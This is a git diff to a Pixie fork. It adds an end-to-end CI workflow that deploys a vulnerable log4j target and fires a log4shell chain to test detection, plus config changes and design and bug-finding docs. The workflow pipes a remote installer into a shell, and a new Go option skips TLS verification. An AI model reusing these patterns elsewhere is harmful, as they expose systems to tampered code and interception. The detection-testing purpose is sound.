diff --git a/.arclint b/.arclint index 7b87106fe80..ee012631a12 100644 --- a/.arclint +++ b/.arclint @@ -20,6 +20,7 @@ "(^private\/credentials\/.*\\.yaml)", "(^src/operator/client/versioned/)", "(^src/operator/apis/px.dev/v1alpha1/zz_generated.deepcopy.go)", + "(^src/e2e_test/adaptive_export_loadtest/tools/loadgen/)", "(^src/stirling/bpf_tools/bcc_bpf/system-headers)", "(^src/stirling/mysql/testing/.*\\.json$)", "(^src/stirling/obj_tools/testdata/go/test_go_binary.go)", diff --git a/.bazelignore b/.bazelignore index d7d6c7da417..70c353d41bc 100644 --- a/.bazelignore +++ b/.bazelignore @@ -6,3 +6,7 @@ third_party/threadstacks tools/chef/nodes # To keep third party dependencies separate, privy is intentional setup as a separate bazel workspace src/datagen/pii/privy + +# adaptive_export_loadtest generator is a docker-built test tool (see its README); +# build-agent to replace with a bazel target. Until then, keep it out of gazelle. +src/e2e_test/adaptive_export_loadtest/tools/loadgen diff --git a/.github/workflows/e2e_log4shell_soc.yaml b/.github/workflows/e2e_log4shell_soc.yaml new file mode 100644 index 00000000000..23982aa087f --- /dev/null +++ b/.github/workflows/e2e_log4shell_soc.yaml @@ -0,0 +1,128 @@ +--- +# e2e-log4shell-soc — stand up a real SOC stack on k3s, fire log4shell end-to-end, +# assert every canonical harness script actually runs, and profile dx in real life. +# +# Heavy: needs eBPF (Pixie PEM) + 16cpu/64gb → the oracle self-hosted runner, NOT +# ubuntu-latest. Deploy mirrors the sovereignsocdemo lab recipe (k8sstormcenter/soc +# make targets) — that kit is makefile-agent's; keep the deploy block in sync with it. +# +# Uses EXISTING k8sstormcenter/pixie repo secrets (no new ones): PX_DEPLOY_KEY, +# PX_API_KEY (Pixie enroll), DX_ENTLEIN_PAT (private entlein/dx image pull), +# CLICKHOUSE_*_PASSWORD, TAILSCALE_AUTH_KEY. Manual by default (it provisions a +# whole cluster); flip the schedule on once it's green. 
+name: e2e-log4shell-soc +on: + workflow_dispatch: + inputs: + dx_image: + description: dx-daemon image to test (default = .image-tags pin) + required: false + default: "" + soc_ref: + description: k8sstormcenter/soc branch + required: false + default: "218-clickhouse-schema" +permissions: + contents: read + +jobs: + e2e: + runs-on: oracle-vm-16cpu-64gb-x86-64 # eBPF + 16cpu/64gb; ubuntu-latest cannot run Pixie + timeout-minutes: 90 + env: + KUBECONFIG: /etc/rancher/k3s/k3s.yaml + HARNESS: src/e2e_test/adaptive_export_loadtest/harness + steps: + - name: Checkout pixie (harness scripts) + uses: actions/checkout@11bd71901bbe5b1630ceea73d27597364c9af683 # v4.2.2 + + - name: Install k3s + run: | + curl -sfL https://get.k3s.io | sh -s - --write-kubeconfig-mode 644 + for i in $(seq 1 60); do kubectl get nodes --no-headers 2>/dev/null | grep -q ' Ready' && break; sleep 5; done + kubectl get nodes + + - name: Deploy the SOC stack (Pixie + kubescape + ClickHouse + AE + dx + log4j chain) + env: + PX_CLOUD_ADDR: pixie.austrianopencloudcommunity.org + PX_DEPLOY_KEY: ${{ secrets.PX_DEPLOY_KEY }} + PX_API_KEY: ${{ secrets.PX_API_KEY }} + TS_AUTHKEY: ${{ secrets.TAILSCALE_AUTH_KEY }} + DX_ENTLEIN_PAT: ${{ secrets.DX_ENTLEIN_PAT }} # private entlein/dx image pull + CLICKHOUSE_ANALYST_PASSWORD: ${{ secrets.CLICKHOUSE_ANALYST_PASSWORD }} + CLICKHOUSE_INGEST_PASSWORD: ${{ secrets.CLICKHOUSE_INGEST_PASSWORD }} + CLICKHOUSE_PIXIE_PASSWORD: ${{ secrets.CLICKHOUSE_PIXIE_PASSWORD }} + run: | + set -euo pipefail + sudo apt-get update -qq && sudo apt-get install -y python3-yaml + git clone --depth 1 -b "${{ inputs.soc_ref }}" https://github.com/k8sstormcenter/soc soc + cd soc + make pixie # vizier + AE + make kubescape || true # node-agent (netStreaming) + bash tree/clickhouse-lab/install.sh # forensic_db + make log4j # vulnerable backend + attacker + dx + SBoBs (managed-by=User) + if [ -n "${{ inputs.dx_image }}" ]; then + kubectl -n honey set image ds/dx-daemon dx-daemon="${{ 
inputs.dx_image }}" || true + fi + # optimal config + enable pprof for the real-life profile (DX_TELEMETRY_CACHE/DX_BENCH + # are defaults in main, set here too in case the kit's manifest predates them) + kubectl -n honey set env ds/dx-daemon DX_PPROF_ADDR=0.0.0.0:6060 DX_TELEMETRY_CACHE=1 DX_BENCH=pemdirect + kubectl -n honey rollout status ds/dx-daemon --timeout=120s + + - name: Wait for stack healthy + run: | + set -euo pipefail + kubectl wait --for=condition=Ready pod -l name=adaptive-export -n pl --timeout=300s + kubectl wait --for=condition=Ready pod -l app=dx-daemon -n honey --timeout=300s + kubectl -n pl get pods; kubectl -n honey get pods; kubectl -n log4j-poc get pods + # dx must be non-blind on pemdirect (the optimal default from #29/#33) + kubectl -n honey logs ds/dx-daemon | grep -E "bench=pemdirect|telemetry cache ENABLED" | head + + - name: Run canonical harness scripts — assert each actually runs + run: | + set -uo pipefail + mkdir -p /tmp/evidence; fail=0 + for s in log4shell_fire exp_matrix nfr exp_row_reconcile; do + echo "::group::$s" + if bash "$HARNESS/$s.sh" > "/tmp/evidence/$s.log" 2>&1; then + echo "PASS $s"; tail -5 "/tmp/evidence/$s.log" + else + echo "FAIL $s (exit $?)"; tail -30 "/tmp/evidence/$s.log"; fail=1 + fi + echo "::endgroup::" + done + # detection gate: dx must rule in the log4shell chain (not just run the script) + kubectl -n honey logs ds/dx-daemon | grep -iE "RULE IN|ruled_in" | tee /tmp/evidence/dx_ruleins.txt + if ! 
grep -qiE "log4shell|control-plane-credential-abuse|RULE IN" \ + /tmp/evidence/dx_ruleins.txt; then + echo "NO dx rule-in — detection failed"; fail=1 + fi + exit $fail + + - name: Profile dx in real life (pprof + metrics) + if: always() + run: | + set -uo pipefail + POD=$(kubectl -n honey get pod -l app=dx-daemon -o jsonpath='{.items[0].metadata.name}') + kubectl -n honey port-forward "$POD" 6060:6060 9095:9095 & PF=$!; sleep 5 + # 30s CPU profile under a fresh fire + heap, served by DX_PPROF_ADDR=:6060 + ( bash "$HARNESS/log4shell_fire.sh" >/dev/null 2>&1 || true ) & + curl -s --max-time 40 -o /tmp/evidence/dx_cpu.pprof \ + "http://127.0.0.1:6060/debug/pprof/profile?seconds=30" || true + curl -s "http://127.0.0.1:6060/debug/pprof/heap" -o /tmp/evidence/dx_heap.pprof || true + curl -s "http://127.0.0.1:9095/metrics" -o /tmp/evidence/dx_metrics.txt || true + go tool pprof -top -nodecount=25 /tmp/evidence/dx_cpu.pprof > /tmp/evidence/dx_cpu_top.txt 2>&1 || true + kill $PF 2>/dev/null || true + echo "=== dx CPU top ==="; head -30 /tmp/evidence/dx_cpu_top.txt + echo "=== verdict latency ===" + grep -E \ + "dx_(time_to_verdict|bench_query_duration)_seconds_(sum|count)" \ + /tmp/evidence/dx_metrics.txt || true + + - name: Upload evidence + profiles + if: always() + uses: actions/upload-artifact@b4b15b8c7c6ac21ea08fcf65892d2ee8f75cf882 # v4.4.3 + with: + name: e2e-log4shell-evidence + path: /tmp/evidence/ + retention-days: 14 diff --git a/.github/workflows/vizier_release.yaml b/.github/workflows/vizier_release.yaml index 1241318085f..ce4f18035e5 100644 --- a/.github/workflows/vizier_release.yaml +++ b/.github/workflows/vizier_release.yaml @@ -140,7 +140,7 @@ jobs: git commit -s -m "Release Helm chart Vizier ${VERSION}" git push origin "gh-pages" update-gh-artifacts-manifest: - runs-on: oracle-8cpu-32gb-x86-64 + runs-on: oracle-vm-16cpu-64gb-x86-64 needs: [get-dev-image, create-github-release] container: image: ${{ needs.get-dev-image.outputs.image-with-tag }} diff --git 
a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml index 5d091f2c989..19f52a640f3 100644 --- a/k8s/vizier/bootstrap/adaptive_export_deployment.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_deployment.yaml @@ -31,6 +31,17 @@ spec: containers: - name: adaptive-export image: vizier-adaptive_export_image:latest + # Bounded so AE can never memory-pressure a node (measured: AE uses + # only ~16-38Mi steady; passthrough with the raised 1M-row cap can + # spike, so 1Gi caps the worst case). CPU was pinned at the old 300m + # limit under concurrent passthrough → raised to 1 core. + resources: + requests: + cpu: 200m + memory: 128Mi + limits: + cpu: "1" + memory: 1Gi env: - name: PL_NAMESPACE valueFrom: diff --git a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml index beced120f63..9250676dca4 100644 --- a/k8s/vizier/bootstrap/adaptive_export_secrets.yaml +++ b/k8s/vizier/bootstrap/adaptive_export_secrets.yaml @@ -1,3 +1,10 @@ +# SEED-ONLY template — NOT in kustomization.yaml (separation of concerns). +# Real credentials are written by `make ae-auth` (pixie-api-key from keys.env, +# clickhouse-dsn = the fixed forensic-CH constant). Do NOT add this back to the +# bundle: a re-apply would clobber the real pixie-api-key with the placeholder +# (the recurring "AE unauthenticated / writes 0" bug). Apply this by hand ONLY +# to seed a brand-new cluster so the AE pod's secretKeyRef resolves before +# ae-auth runs. 
--- apiVersion: v1 kind: Secret diff --git a/k8s/vizier/bootstrap/kustomization.yaml b/k8s/vizier/bootstrap/kustomization.yaml index e373c6bbfe3..e2afd14af16 100644 --- a/k8s/vizier/bootstrap/kustomization.yaml +++ b/k8s/vizier/bootstrap/kustomization.yaml @@ -16,5 +16,10 @@ resources: - cert_provisioner_job.yaml - vizier_crd_role.yaml - adaptive_export_role.yaml -- adaptive_export_secrets.yaml +# adaptive_export_secrets.yaml is intentionally NOT bundled here: it holds real +# credentials (pixie-api-key, clickhouse-dsn) owned by `make ae-auth`. Bundling +# it meant every infra re-apply clobbered the real key with the placeholder. +# Separation of concerns: infra (role+deployment) re-appliable; secret is +# created ONCE by ae-auth and never touched by this kustomization. ponytail: +# apply adaptive_export_secrets.yaml manually only to seed a fresh cluster. - adaptive_export_deployment.yaml diff --git a/skaffold/skaffold_vizier.yaml b/skaffold/skaffold_vizier.yaml index f8370a1f7e1..58b6bba70af 100644 --- a/skaffold/skaffold_vizier.yaml +++ b/skaffold/skaffold_vizier.yaml @@ -36,8 +36,8 @@ build: bazel: target: //src/vizier/services/cloud_connector:cloud_connector_server_image.tar args: - - --config=x86_64_sysroot - - --compilation_mode=opt + - --config=x86_64_sysroot + - --compilation_mode=opt - image: vizier-cert_provisioner_image context: . bazel: diff --git a/src/api/go/pxapi/opts.go b/src/api/go/pxapi/opts.go index 7de095a7f1a..0e2948f999c 100644 --- a/src/api/go/pxapi/opts.go +++ b/src/api/go/pxapi/opts.go @@ -82,3 +82,17 @@ func WithDirectCredsInsecure() ClientOption { c.insecureDirect = true } } + +// WithDirectTLSSkipVerify is the encrypted-but-unverified option for direct (standalone / +// node-local PEM) connections: the transport IS TLS-encrypted, but the server cert +// is not chain/hostname-verified. 
Use this instead of WithDirectCredsInsecure when +// the direct endpoint serves TLS with a self-signed / service cert whose SAN does +// not match the node IP (e.g. vizier-pem's direct-query port served with +// service-tls-certs, dialed at HOST_IP). Unlike WithDisableTLSVerification it does +// NOT require a "cluster.local" address, so it works for the node-IP direct dial. +// Bearer creds (the minted JWT) ride an encrypted channel, never plaintext; the peer is NOT authenticated, so an active MITM is not prevented. +func WithDirectTLSSkipVerify() ClientOption { + return func(c *Client) { + c.disableTLSVerification = true + } +} diff --git a/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md new file mode 100644 index 00000000000..f848d63e149 --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/CONTRACTS.md @@ -0,0 +1,98 @@ +# Adaptive Export (AE) — implied contracts + +What AE *currently assumes but does not enforce*. Each ⚠️ is an **implied** contract +(a silent assumption); 🔴 marks ones we've observed violated, with the fix. Grounded +in `src/vizier/services/adaptive_export/` (trigger, controller, sink, config) + the +`forensic_db` DDL. + +## End-to-end data flow + where each contract sits + +```mermaid +flowchart TD + subgraph PROD["Producer (per node)"] + VEC["Vector kubescape_enrich sink
(or load-test fixtures)"] + end + subgraph CH1["ClickHouse — input"] + KL["forensic_db.kubescape_logs
MergeTree ORDER BY (event_time, hostname)
TTL toDateTime(event_time)+30d"] + end + subgraph AE["adaptive_export (per node DaemonSet)"] + TRG["TRIGGER: poll 250ms
WHERE hostname=NODE AND event_time>=watermark
ORDER BY event_time LIMIT N"] + CTL["CONTROLLER: hash + active-set
window [event_time-Before, now)"] + PXL["DATA-PLANE: PxL per (ns,pod)×table
refresh every 30s while window open"] + end + subgraph VZ["Pixie"] + QB["vizier-query-broker → PEMs"] + end + subgraph CH2["ClickHouse — output (forensic_db)"] + ATTR["adaptive_attribution
ReplacingMergeTree(t_end)
ORDER BY (hostname, anomaly_hash)"] + WM["trigger_watermark
ReplacingMergeTree(updated_at)"] + PROT["http/dns/pgsql/conn_stats/...
plain MergeTree (NO dedup)"] + end + + VEC -->|"C1 ⚠️ event_time UNIT = seconds
C2 ⚠️ hostname = k8s node name"| KL + KL -->|"C3 🔴 event_time monotone ≥ watermark
C4 ⚠️ boundary dedup by content fp"| TRG + TRG --> CTL + CTL -->|"C5 ⚠️ anomaly_hash = f(pid,comm,pod,ns) only"| ATTR + TRG -->|"C6 ⚠️ watermark persist throttled ~5s"| WM + CTL --> PXL + PXL -->|"C7 needs registered vizier"| QB + QB -->|"C8 🔴 plain MergeTree + 30s re-pull → dup"| PROT + PXL -->|"C9 ⚠️ write only if rows>0"| PROT + ATTR -. "C10 ⚠️ join: events.pod = ns/pod ↔ attribution.pod = bare" .- PROT +``` + +## Boot / dependency contract + +```mermaid +flowchart LR + ENV["ENV (all non-empty or FATAL):
PIXIE_CLUSTER_ID · CLUSTER_NAME
PIXIE_API_KEY · CLICKHOUSE_DSN"] --> BOOT + CM["cm/pl-cloud-config
PL_CLOUD_ADDR=…:443"] -->|"C11 🔴 missing :443 → crashloop"| BOOT + BOOT["AE boot"] --> DDL["C12 self-applies forensic_db DDL
(ADAPTIVE_SKIP_APPLY=false)"] + BOOT --> CTRLPLANE["control plane: CH only"] + BOOT --> DATAPLANE["data plane: needs query-broker
(C7) + ADAPTIVE_PUSH_PIXIE_ROWS"] +``` + +## Contract register + +| # | Contract (implied) | Enforced? | Status / fix | +|---|---|---|---| +| C1 | `kubescape_logs.event_time` is unix **seconds** (one unit end-to-end) | ❌ trigger auto-detects s/ms/ns; DDL `toDateTime()` assumes seconds | 🔴 **F8 root** — see C3; AE-2 standardize+normalize | +| C2 | `hostname` = the k8s **node** name (AE polls `WHERE hostname=node`) | ❌ convention only | ⚠️ fixtures must use a real node, else no AE ever reads them | +| C3 | every new anomaly's `event_time` ≥ current watermark (monotone) | ❌ strict HWM filter | 🔴 **F8** — a larger-unit / out-of-order / future row poisons the HWM → all later rows silently dropped. **Fix (PR #53):** normalize cursor to nanos (`chNormEventTimeNanos`); AE-9: ingest-order cursor / bounded-lookback+dedup + below-watermark metric | +| C4 | rows sharing `event_time` at the boundary are deduped by content fingerprint | ✅ `seenAtBoundary` | ok | +| C5 | `anomaly_hash = SHA256(pid,comm,pod,ns)[:16]` — identity is the **workload**, independent of event_time/RuleID | ✅ | ok (N events for one target → 1 attribution row) | +| C6 | `trigger_watermark` persisted value tracks the live cursor | ❌ throttled ~5s | ⚠️ external readers/restart see up to 5s stale; AE-7 flush-on-shutdown | +| C7 | data-plane requires a **registered** vizier query-broker | ❌ | ⚠️ control plane works without it; data plane silently does nothing | +| C8 | re-pulling a window is idempotent | ❌ protocol tables plain MergeTree (no dedup) + 30s re-pull | 🔴 duplicate inflation. 
**Fix:** single-shot (`ADAPTIVE_PUSH_REFRESH_SEC=-1`, or `AFTER>Pixie: PxL per table for (ns,pod), slice since last_upper + Pixie-->>AE: rows + AE->>CH: write rows (write ⊇ DX read, C14) + end + DX->>AE: StartExport / StopExport / extend t_end (control surface, CONTROL_ADDR) + Note over AE: stop ONLY on t_end or DX stop — never silently early (C15) +``` + +- **DX controls:** (1) open/extend a window (each referral/anomaly extends `t_end`), (2) explicit **StopExport** via the control surface (`CONTROL_ADDR`, design rev-3 — confirm wired), (3) the active set (which pods AE over-captures). +- **DX relies on:** C5 (stable hash identity), C14 (write ⊇ read), **C15 (no premature stop)**, C9 (0 rows only when the workload is genuinely silent), C10 (the `ns/pod` ↔ bare join). For DX to steer dependably, C3/C8/C13/C15 must move from 🔴 to ✅. + +## Legend +✅ enforced in code · ⚠️ implied (assumed, not checked) · 🔴 observed violated (fix noted). +Full repro + backlog: `FINDINGS_AND_BACKLOG.md`. The fixes for C3/C1 are on PR #53 (`ae-prod`). diff --git a/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md new file mode 100644 index 00000000000..c385b04a6ec --- /dev/null +++ b/src/e2e_test/adaptive_export_loadtest/FINDINGS_AND_BACKLOG.md @@ -0,0 +1,170 @@ +# AE load-test — reproducible findings + robustness backlog + +Rig `6a3066767841074cd3200495` (k3s, 2 nodes), AE `vizier-adaptive_export_image:0.14.19-aeprod-clean3`, +control plane against ClickHouse (real kubescape NOT deployed; only `kubescape_logs` fixtures injected). +Every finding below is REPRODUCED with the harness in `aeload/`; numbers are measured, not estimated. + +## Headline + +1. **The "writes stop after initial success, data still on Pixie" bug is REPRODUCED (F8).** AE's trigger + gates on a strict high-water-mark of the kubescape-supplied `event_time`; **any anomaly with + `event_time < watermark` is silently dropped**. 
A single mixed-unit row (nanos/millis) poisons the + watermark to ~1.78e18 → every subsequent seconds-row is dropped **forever** → AE stops writing + although Pixie still has the data. Reproduced + recovered (reset watermark + restart) on the rig. +2. AE's **control-plane write surface is EXACTLY reproducible** when event_times are monotonic — `71/71` + then `20/20` (E1, seconds-native) std=0. +3. **F1 correction:** production (soc Vector) emits `event_time` in **seconds**, for which the DDL TTL is + correct. My earlier "DDL bug" report was triggered by my fixtures using **nanoseconds**; the real, + durable issue is that the unit is **not standardized/enforced** (trigger auto-detects s/ms/ns; DDL + assumes seconds) — which is also the root enabler of the F8 catastrophe. + +## Reproducible findings + +### F8 — CRITICAL (likely THE production bug): watermark high-water-mark silently drops any `event_time < watermark` +`trigger_watermark` is a monotonic cursor on the kubescape-supplied `event_time` (the trigger SELECT does +`WHERE event_time >= watermark`). It is **content-derived, not ingest-ordered**, so it is fragile to: +1. **Unit heterogeneity (catastrophic):** one anomaly in nanos/millis sets `watermark ≈ 1.78e18`; every + later seconds-row (`~1.78e9`) is `< watermark` → dropped **forever**. The trigger explicitly supports + s/ms/ns, so a mixed pipeline guarantees this. +2. **Clock skew / out-of-order alerts:** a late/earlier-stamped anomaly after a newer one → dropped. +3. **Restart re-scan:** on reboot AE loads the persisted watermark (or re-scans to the max existing row), + so anomalies stamped below that max are never processed. +Effect = "writes succeed initially, then stop, data still on Pixie" (the trigger halts; the data plane +and Pixie are fine). **Reproduced on the rig** (E8 sustained): with the watermark poisoned at a leftover +nanos value (`1781559619170395824`), 25/25 ticks of fresh seconds anomalies → **n_anomalies stayed 0**. 
+After `ALTER TABLE trigger_watermark DELETE WHERE 1=1` + AE restart, once tick event_times rose above the +re-scanned max, **n_anomalies grew 1→2→3→4, delta=1 per tick** (healthy steady state). Evidence: +`e8_steady.csv` (stalled), `e8_recov.csv` (recovered + steady growth). + +### F1 — `kubescape_logs` TTL/PARTITION assume seconds; non-seconds producers are TTL-deleted (unit not enforced) +**Correction to the earlier report:** production (soc Vector, `to_unix_timestamp(ts)` = VRL **seconds**; +confirmed by the AE code comment "Vector's kubescape sink … writes unix SECONDS ~1.7e9") emits **seconds**, +for which `toDateTime(event_time)` is CORRECT — the DDL is **not** buggy in production. The overflow I first +saw was caused by **my fixtures using nanoseconds** (copied from the Go `integration_test`/`e2e` convention, +which use `UnixNano`). The durable issue: the unit is **unstandardized** — the trigger auto-detects +s/ms/ns but the DDL hardcodes seconds, so a millis/nanos producer has ALL its `kubescape_logs` +TTL-deleted. Original (now-superseded) overflow detail follows for the record: +`event_time` is UInt64 **nanoseconds** (all Go code + every fixture + `integration_test.go` use +`UnixNano`). But the DDL (soc `clickhouse-lab/schema.sql` AND AE's embedded +`internal/clickhouse/schema.sql`) does: +```sql +PARTITION BY toYYYYMM(toDateTime(event_time)) +TTL toDateTime(event_time) + INTERVAL 30 DAY +``` +`toDateTime()` interprets its arg as **seconds**. Reproduced on the rig: +``` +toDateTime(1781559074162913804) = 2106-02-07 (saturates at DateTime max) +toDateTime(1781559074162913804)+30 DAY = 1970-01-30 (OVERFLOWS past max → wraps to 1970) +(... ) < now() = 1 (already_expired) +``` +→ every row is born already-expired → CH TTL-deletes `kubescape_logs` on the next merge. +Measured: after injecting ~20 anomalies, `kubescape_logs` held **2** rows; all showed `expired=1`. 
+The AE trigger (250 ms poll) races the merge: anomalies polled before deletion get an +`adaptive_attribution` row; the rest are **lost with no error logged** (the ~10% E1 miss). +PARTITION is also broken — every row lands in the single `2106-02` partition. + +**Fix validated on the rig:** +```sql +ALTER TABLE forensic_db.kubescape_logs + MODIFY TTL toDateTime(intDiv(event_time, 1000000000)) + INTERVAL 30 DAY; +``` +→ `ttl_expiry = 2026-07-15`, `expired = 0` → **E1 re-run = 20/20 PASS, std=0** (was ~9/10). + +### F2 — Anomaly loss is silent + unretried +When F1 (or any input-side pruning / transient CH write error) drops an anomaly, AE logs **nothing** +and never retries — `adaptive_attribution` simply lacks the row. There is no `dropped_anomalies` / +`trigger_lag` metric to detect it. Reproduced: rep 8 had 0 attribution, AE log had zero errors/warnings. + +### F3 — POSITIVE: control plane is EXACTLY reproducible when processed +With F1 fixed: `uniqExact(anomaly_hash)` and `adaptive_attribution` FINAL counts are **std=0 / CV=0** +across all reps. Dedup is deterministic (N events for one (pid,comm,pod,ns) → 1 hash → 1 row). +Measured (TTL-fixed): +- **E1** single anomaly = **20/20 EXACT** (uniq=1, attrib=1 every rep) +- **E3** fan-out (8 distinct pods) = **20/20 EXACT** (uniq=8, attrib=8 every rep) +- **E4** boundary collision (2 rows, same `event_time`, different RuleID, same target) = **20/20 EXACT** + (fingerprint-dedup deterministic → 1 hash, 1 row) +- **E2** dedup/extend (10 events, 1 target → 1 row) = **10/10 EXACT** (uniq=1, attrib=1) +- **E6** restart idempotency = **1/1 EXACT** — attribution stayed exactly 1 across an AE rollout-restart + (no double-count on watermark reload) + +**Total: 71/71 control-plane reps EXACT (std=0)** after AE-1. 
+ +### F4 — AE cannot boot for ClickHouse-only / control-plane-only operation +AE fatals at config validation without pixie cluster identity, even when only the CH trigger→attribution +path is needed: +``` +fatal "missing required env variable 'PIXIE_CLUSTER_ID'" then 'CLUSTER_NAME' +``` +Worked around with a dummy `PIXIE_CLUSTER_ID` + `CLUSTER_NAME` + `ADAPTIVE_PUSH_PIXIE_ROWS=false`. +This couples the (CH-only) control plane to a healthy vizier registration that it does not use. + +### F5 — `trigger_watermark` persistence is throttled (~5 s) +The persisted cursor lags the in-memory cursor by up to `ADAPTIVE_WATERMARK_SAVE_SEC` (default 5 s). +Reproduced: queried `watermark` lagged the just-injected `event_time` by one rep repeatedly (the +in-memory cursor + `adaptive_attribution` were already correct). On crash, up to that interval of +progress is lost → reprocessing (dedup-safe, but wasteful + can surprise external observers). + +### F6 — (provisioning / dependability) custom-version vizier never registered +`make pixie` with `VIZIER_VERSION=…-aeprod-clean3` (extract_yaml path) left **`pl-cloud-config`** and +**`pl-cluster-secrets`** uncreated → cert-provisioner crashloops (`pl-cloud-config not found`, +`pl-cluster-secrets does not exist`) → NATS/PEM/query-broker never start → **no data plane**. Hand-created +`pl-cloud-config`; `pl-cluster-secrets` requires cloud registration. This blocks the live **E5 data-plane** +experiments (harness is ready, waiting on a healthy `vizier-query-broker`). + +### F7 — single-pull config confirmed +AE boots with `window_after=5s window_before=2m0s poll_interval=250ms` — `AFTER (5s) < refresh (30s)` +forces exactly one pull per window on the published image (so the non-deduping MergeTree protocol tables +aren't re-inserted). The new `ADAPTIVE_PUSH_REFRESH_SEC=-1` knob (added this branch, uncommitted) is the +explicit equivalent. 
+ +## Backlog — make AE repeatable, robust, dependable + +| ID | Pri | Fix | Why | +|----|-----|-----|-----| +| **AE-9** | **P0** | **Make the trigger cursor robust** — don't gate on the content `event_time` as a strict HWM. Options: (a) cursor on **ingest order** (a monotonic insert id / `_part`+row, or an `inserted_at DEFAULT now64()` column) instead of `event_time`; (b) bounded **lookback window** (re-scan `event_time >= watermark - L`) + **content-dedup** (anomaly fingerprint) so out-of-order/skewed/below-watermark anomalies are still processed exactly once; (c) NORMALIZE `event_time` to one unit before it ever reaches the cursor. Add `dx_anomalies_below_watermark_total` + `trigger_watermark_seconds` metrics + alert. | **F8 — the production "writes stop, data on Pixie" bug.** A single mixed-unit/skewed/out-of-order row poisons the HWM → silent total halt. Highest-impact dependability fix. | +| **AE-2** | **P0** | Standardize `event_time` to ONE documented unit + **normalize-or-reject at ingest** (Vector + AE); remove the trigger's silent s/ms/ns auto-detect (it *enables* F8 + F1). | The unit ambiguity is the root enabler of both F8 (watermark poison) and F1 (TTL delete). | +| **AE-1** | P1 | Make the `kubescape_logs` DDL TTL **and** PARTITION unit-agnostic (e.g. normalize `event_time` in a MATERIALIZED `event_dt DateTime64(9)` used by TTL/PARTITION) so a non-seconds producer isn't silently TTL-deleted. Patch BOTH soc `clickhouse-lab/schema.sql` and AE embedded `internal/clickhouse/schema.sql`. | F1: defense-in-depth — even with AE-2, a stray non-seconds row shouldn't vanish. (Production seconds path is currently correct.) | +| **AE-3** | P1 | Eliminate the retention-vs-trigger race: AE should own `kubescape_logs` deletion (delete only AFTER an anomaly is acked into `adaptive_attribution`), OR decouple trigger progress from row TTL. Add `dx_anomalies_dropped_total` + `trigger_lag_seconds` metrics + alert. 
| F1/F2: today a pruned-before-polled row is lost invisibly. Observability + ordering guarantee. | +| **AE-4** | P1 | Make `adaptive_attribution` writes durable — retry with backoff, count failures, never silently drop. | F2: best-effort write = unaccounted loss under any CH hiccup. | +| **AE-5** | P1 | Allow CH-only / control-plane boot: make `PIXIE_CLUSTER_ID`/`CLUSTER_NAME`/`PIXIE_API_KEY` optional when `ADAPTIVE_PUSH_PIXIE_ROWS=false` and not streaming/passthrough. | F4: enables AE testing + degraded operation without a healthy vizier. | +| **AE-6** | P2 | Make protocol tables `ReplacingMergeTree` keyed by (hostname,event_time,upid,…) so repeated pulls are idempotent regardless of refresh; keep `ADAPTIVE_PUSH_REFRESH_SEC` (done) for explicit single-shot. | Data-plane robustness: removes the "plain MergeTree + 30s re-pull → duplicate inflation" footgun (the reason single-pull is currently required). | +| **AE-7** | P2 | Flush `trigger_watermark` on shutdown; make the save throttle configurable. | F5: bound crash-reprocessing + give observers a fresh cursor. | +| **AE-8** | P2 | (makefile-agent) `make pixie` for custom `VIZIER_VERSION` must create `pl-cloud-config` and complete cloud registration (`pl-cluster-secrets`). | F6: blocks data-plane e2e + any real deployment of a custom AE build. | + +## Fix implemented + validated (F8 / AE-2 unit-normalization) + +**Code (working tree, `internal/trigger/clickhouse.go`):** the trigger cursor is now **canonical +nanoseconds**. Added `normalizeEventTimeNanos()` (s/ms/ns → ns, same thresholds as +`controller.eventTimeToTime`) + `chNormEventTimeNanos` (the ClickHouse equivalent). The poll SELECT now +filters + orders on `chNormEventTimeNanos >= watermark` (was raw `event_time >= watermark`); +`maxSeen`, the in-memory watermark, the boundary-dedup compare, and the loaded/persisted watermark are all +normalized. Net: a mixed-unit row can no longer drive the HWM past real rows. 
Unit test +`clickhouse_internal_test.go` (in-package; runs on a build PG): `TestNormalizeEventTimeNanos` + +`TestFetchSinceFiltersOnNormalizedEventTime`. + +**Empirically validated at the data layer on the rig (no AE rebuild needed)** — against the actual +poisoned watermark `1781559619170395824`: +- OLD raw filter `event_time >= wm` → **0 rows** (AE sees nothing = the bug) +- NEW normalized filter `chNormEventTimeNanos >= wm` → **60 rows** (all recovered) +- table held 60 cplane-01 rows the whole time — the filter was the sole cause. + +**Still to land:** rebuild + deploy the AE image carrying this Go change (can't `git push` per rules → +hand to build-agent / `gh-pixie-build`), then re-run E8 to confirm no-poison live. AE-9 (out-of-order +lookback + below-watermark metric) and AE-1 (unit-agnostic DDL TTL/PARTITION) remain. + +## Reproducibility status + +| Layer / experiment | Status | +|---|---| +| Control plane E1 (single) | ✅ **20/20 EXACT (std=0)** after AE-1 fix | +| Control plane E3 (fan-out) | ✅ **20/20 EXACT** (uniq=8, attrib=8) | +| Control plane E4 (boundary collision) | ✅ **20/20 EXACT** (uniq=1, attrib=1) | +| Control plane E2 (dedup) | ✅ **10/10 EXACT** (uniq=1, attrib=1) | +| Control plane E6 (restart idempotency) | ✅ **1/1 EXACT** (attrib stayed 1 across AE restart) | +| **Control plane total** | ✅ **71/71 reps EXACT (std=0)** + **E1 20/20 seconds-native** | +| E8 sustained same-pod (control) | ✅ reproduces F8 (stall when event_time ≤ watermark) + recovers to steady delta=1 growth | +| Data plane E5 + E8-data | ⛔ blocked on F6 (vizier not registered); data-plane rig requested from makefile-agent; harness ready | +| L1 hermetic (`go test`, exact bytes) | 🧰 authored; runs on a build PG (pixie module compile) | + +NOTE: harness is now **seconds-native** (production unit). The earlier 71/71 used nanos + a compensating +TTL ALTER; E1 was re-confirmed **20/20 std=0 natively with seconds** + the seconds-correct DDL (no ALTER). 
